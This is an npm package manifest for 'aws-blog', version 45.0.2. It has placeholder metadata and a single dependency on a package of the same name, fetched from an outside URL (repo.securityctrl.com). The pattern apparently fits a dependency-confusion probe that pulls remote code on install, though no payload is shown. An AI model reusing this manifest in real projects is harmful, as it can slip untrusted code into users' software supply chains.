{
  "name": "aws-blog",
  "version": "45.0.2",
  "description": "Simple first commit.",
  "main": "index.js",
  "bin": {
    "aws-blog": "index.js"
  },
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "",
  "dependencies": {
    "aws-blog": "https://repo.securityctrl.com/aws-blog"
  }
}